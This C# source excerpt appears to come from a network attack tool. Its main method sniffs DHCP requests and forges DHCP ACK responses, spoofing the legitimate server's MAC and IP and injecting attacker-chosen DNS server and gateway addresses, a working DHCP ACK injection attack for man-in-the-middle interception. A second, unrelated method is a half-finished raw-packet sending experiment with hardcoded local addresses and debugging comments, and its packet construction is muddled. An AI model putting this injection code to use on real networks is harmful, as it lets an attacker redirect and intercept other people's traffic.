unsafe public void AnalyzePacket(WinPcapDevice device, Packet p)
{
if (p.PayloadPacket == null || p.PayloadPacket.PayloadPacket == null || !(p.PayloadPacket.PayloadPacket is UdpPacket))
return;
UdpPacket udp = (UdpPacket)p.PayloadPacket.PayloadPacket;
if (udp.ParentPacket == null)
return;
if (!(udp.ParentPacket is IPv4Packet))
return;
IPv4Packet packetIpLayer = (IPv4Packet)udp.ParentPacket;
if (udp.PayloadData.Length < sizeof(DHCP.bootp))
return;
DHCP.bootp* dhcp = (DHCP.bootp*)Marshal.UnsafeAddrOfPinnedArrayElement(udp.PayloadData, 0).ToPointer();
DHCP.RequestedIP optionRequestedIP = new DHCP.RequestedIP();
bool existsOptionRequestedIP = false;
DHCP.ServerID optionServerID = new DHCP.ServerID();
bool existsOptionServerID = false;
string Strname = string.Empty;
ushort bp_vend_len = (ushort)(udp.Length - Marshal.SizeOf(*dhcp) + 4);
uint pos = 4;
while (pos < bp_vend_len)
{
byte option = dhcp->bp_vend[pos];
if (option == 0xff)
{
break;
}
byte len = dhcp->bp_vend[pos + 1];
switch (option)
{
case DHCP.TAG_DHCP_MESSAGE:
{
DHCP.MessageType* mtype = (DHCP.MessageType*)(dhcp->bp_vend + pos);
//We save the real DHCP IP
if (mtype->type == DHCP.DHCPACK && packetIpLayer.SourceAddress.Address != 0)
DHCPIP = packetIpLayer.SourceAddress;
//We get the DHCP Server MAC
if (mtype->type == DHCP.DHCPOFFER)
DHCPMAC = (p as EthernetPacket).SourceHwAddress;
//We only continue if it's a DHCP Request
if (mtype->type != DHCP.DHCPREQUEST)
return;
break;
}
case DHCP.TAG_REQUESTED_IP:
{
optionRequestedIP.id = ((DHCP.RequestedIP*)(dhcp->bp_vend + pos))->id;
existsOptionRequestedIP = true;
break;
}
case DHCP.TAG_SERVER_ID:
{
optionServerID.id = ((DHCP.ServerID*)(dhcp->bp_vend + pos))->id;
DHCPIP = new IPAddress(optionServerID.id);
existsOptionServerID = true;
break;
}
case DHCP.TAG_HOSTNAME:
{
byte* chr = (((DHCP.Hostname*)(dhcp->bp_vend + pos))->name);
byte lenght = ((DHCP.Hostname*)(dhcp->bp_vend + pos))->optionHeader.lenght;
for (int i = 0; i < lenght; i++)
Strname += (char)chr[i];
break;
}
}
pos += (uint)len + 2; //The option and the length field
}
bool realizarataque = false;
string dns = string.Empty;
string gateway = string.Empty;
string MAC;
foreach (Data.Attack attack in attacks.Where(A => A.attackType == Data.AttackType.DHCPACKInjection && A.attackStatus == Data.AttackStatus.Attacking))
{
dns = (attack as DHCPACKInjectionAttack).dns;
gateway = (attack as DHCPACKInjectionAttack).gateway;
MAC = (attack as DHCPACKInjectionAttack).MAC;
//If filter does not apply not continue
if (!string.IsNullOrEmpty(MAC) && !(p.PayloadPacket as EthernetPacket).SourceHwAddress.Equals(PhysicalAddress.Parse(MAC)))
realizarataque = false;
else
{
realizarataque = true;
break;
}
}
if (!realizarataque)
return;
//Configuration used in the attack
PhysicalAddress MACUsed;
if (Program.CurrentProject.data.settings.UseRealDHCPData)
{
if (DHCPMAC != null)
MACUsed = DHCPMAC;
else //If the real dhcp server mac is not found we use the computer network device mac
MACUsed = device.Interface.MacAddress;
}
else
{
MACUsed = PhysicalAddress.Parse(Program.CurrentProject.data.settings.DHCPFakeServerMAC);
}
IPAddress IPUsed;
if (Program.CurrentProject.data.settings.UseRealDHCPData)
{
if (existsOptionServerID)
IPUsed = new IPAddress(optionServerID.id);
else
{
if (DHCPIP.Address == 0)
{
Program.LogThis("DHCP IP Address unknown, using 0.0.0.0 as IP source", Logs.Log.LogType.DHCPACKInjection);
IPUsed = IPAddress.Parse("0.0.0.0");
}
else
{
IPUsed = DHCPIP;
}
}
}
else
{
IPUsed = IPAddress.Parse(Program.CurrentProject.data.settings.DHCPFakeServerIP);
}
//Now we create a fake response
EthernetPacket response = new EthernetPacket(MACUsed, new PhysicalAddress(new byte[] { 0xff, 0xff, 0xff, 0xff, 0xff, 0xff }), EthernetPacketType.IpV4);
response.PayloadPacket = new IPv4Packet(IPUsed, new System.Net.IPAddress(0xffffffff));
//We want to follow the IP communication
(response.PayloadPacket as IPv4Packet).Id = packetIpLayer.Id;
response.PayloadPacket.PayloadPacket = new UdpPacket(67, 68);
response.PayloadPacket.PayloadPacket.PayloadData = new byte[16];
response.PayloadPacket.PayloadPacket.PayloadData = new byte[sizeof(DHCP.bootp) + sizeof(DHCP.optionsResponse)];
dhcp->bp_op = DHCP.BOOTPREPLY;
if (existsOptionRequestedIP)
dhcp->bp_yiaddr = optionRequestedIP.id;
else if (dhcp->bp_ciaddr != 0)
dhcp->bp_yiaddr = dhcp->bp_ciaddr;
else
{
return;
}
dhcp->bp_flags = 0;
Marshal.Copy(new IntPtr(dhcp), response.PayloadPacket.PayloadPacket.PayloadData, 0, sizeof(DHCP.bootp));
//We need to fill the optionResponseStatic fields
if (existsOptionServerID)
optionResponseStatic.serverID.id = optionServerID.id;
optionResponseStatic.serverID.id = (uint)IPUsed.Address;
optionResponseStatic.route.ip = (uint)IPAddress.Parse(gateway).Address;
optionResponseStatic.domainNameServer.ip = (uint)IPAddress.Parse(dns).Address;
fixed (DHCP.optionsResponse* op = &optionResponseStatic)
{
Marshal.Copy(new IntPtr(op), response.PayloadPacket.PayloadPacket.PayloadData, sizeof(DHCP.bootp), sizeof(DHCP.optionsResponse));
}
response.UpdateCalculatedValues();
(response.PayloadPacket as IPv4Packet).UpdateCalculatedValues();
(response.PayloadPacket as IPv4Packet).UpdateIPChecksum();
(response.PayloadPacket.PayloadPacket as UdpPacket).UpdateCalculatedValues();
(response.PayloadPacket.PayloadPacket as UdpPacket).UpdateUDPChecksum();
device.SendPacket(response);
string message = string.Format("DHCP ACK sent to a {0} DHCP Request", new IPAddress(dhcp->bp_yiaddr).ToString());
Program.LogThis(message, Logs.Log.LogType.DHCPACKInjection);
}
public int sendPacket()
{
byte[] bytes = new byte[4096];
ByteArraySegment bas = new ByteArraySegment(bytes);
ushort srcPort = 23444;
ushort dstPort = 12345;
PacketDotNet.UdpPacket udpPacket = new UdpPacket(srcPort, dstPort);
string cmdString = "xxxxyyyyHello world!";
byte[] sendBuffer = Encoding.ASCII.GetBytes(cmdString);
udpPacket.PayloadData = sendBuffer;
ICMPv4Packet icmpPacket = new ICMPv4Packet(new ByteArraySegment(sendBuffer));
// sanity check:
//bas.BytesLength = 10;
//Console.WriteLine("bas - Offset = " + bas.Offset + " len= " + bas.Length);
IPAddress ipSrcAddr = System.Net.IPAddress.Parse("192.168.0.186"); // laptop
IPAddress ipDestAddr = System.Net.IPAddress.Parse("192.168.0.185"); // my linux box
IpPacket ipPacket = new IPv4Packet(ipSrcAddr, ipDestAddr);
ipPacket.PayloadPacket = udpPacket;
icmpPacket.TypeCode = ICMPv4TypeCodes.Unassigned1;
icmpPacket.Sequence = 1;
Console.WriteLine("icmpPacket - TypeCode = " + icmpPacket.TypeCode + " Sequence= " + icmpPacket.Sequence);
Console.WriteLine("icmpPacket : " + icmpPacket.PrintHex());
icmpPacket.UpdateCalculatedValues();
Console.WriteLine("icmpPacket : " + icmpPacket.PrintHex());
//ushort etype = 0xFF00; //EthernetPacketType RAW ?
System.Net.NetworkInformation.PhysicalAddress ethSrcAddr = System.Net.NetworkInformation.PhysicalAddress.Parse("02-1E-EC-8F-7F-E1");
System.Net.NetworkInformation.PhysicalAddress ethDstAddr = System.Net.NetworkInformation.PhysicalAddress.Parse("48-5B-39-ED-96-36");
EthernetPacket ethernetPacket = new EthernetPacket(ethSrcAddr, ethDstAddr, EthernetPacketType.IpV4);
// I thought "None" for type would fill in type automatically; but it remained zero on the wire and was flagged "Malformed"
ethernetPacket.PayloadPacket = icmpPacket;
Console.WriteLine("ethernetPacket : " + ethernetPacket.PrintHex());
ethernetPacket.Type = EthernetPacketType.IpV4;
Console.WriteLine("ethernetPacket : " + ethernetPacket.PrintHex());
//ipPacket.PayloadPacket = udpPacket;
//ethernetPacket.PayloadPacket = gmpPacket; //ipPacket;
ethernetPacket.UpdateCalculatedValues();
Console.WriteLine(ethernetPacket.ToString());
ipPacket.UpdateCalculatedValues();
//udpPacket.UpdateUDPChecksum();
// Experiment with raw ip packet?
ipPacket.Protocol = IPProtocolType.RAW;
// Why isn't ValidChecksum true?
//Console.WriteLine("After updating calculated values, ValidUDPChecksum = " + udpPacket.ValidUDPChecksum + " ValidChecksum = " + udpPacket.ValidChecksum);
//Console.WriteLine(ethernetPacket.ToString());
device.Open(DeviceMode.Normal, 15000); // 15 sec timeout
//ushort checksum = csum(ipPacket.BytesHighPerformance, ipPacket.P);
device.SendPacket(ethernetPacket);
return 0;
}